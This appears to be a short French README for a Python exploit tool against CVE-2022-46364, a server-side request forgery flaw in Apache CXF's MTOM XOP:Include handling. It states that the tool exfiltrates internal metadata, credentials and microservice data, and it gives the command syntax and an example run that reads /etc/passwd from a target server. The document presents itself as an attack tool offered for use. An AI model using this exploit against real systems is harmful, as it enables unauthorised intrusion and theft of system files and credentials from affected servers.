
Exploit Python pour CVE-2022-46364 (Apache CXF SSRF via MTOM XOP:Include). Envoie des requêtes SOAP spécialement conçues pour exfiltrer les métadonnées internes, les identifiants et les données de microservices à partir de points de terminaison vulnérables.
Apache CXF SSRF via MTOM XOP:Include | CVSS 9.8 CRITIQUE
Apache CXF < 3.5.5 / < 3.4.10 permet une falsification de requête côté serveur via des attributs href XOP:Include non validés dans des requêtes SOAP encodées en MTOM.
python3 exploit.py -t <TARGET_URL> -s <SSRF_URL> -d <DOMAIN>
-t, --target - Point de terminaison SOAP CXF vulnérable (obligatoire)-s, --ssrf-url - URL interne à exfiltrer (obligatoire)-d, --domain - Domaine cible (par défaut : localhost)--plain-soap - Utiliser SOAP simple au lieu de MTOM# Lire /etc/passwd
python3 exploit.py -t http://target.com:8080/employeeservice -s file:///etc/passwd -d target.com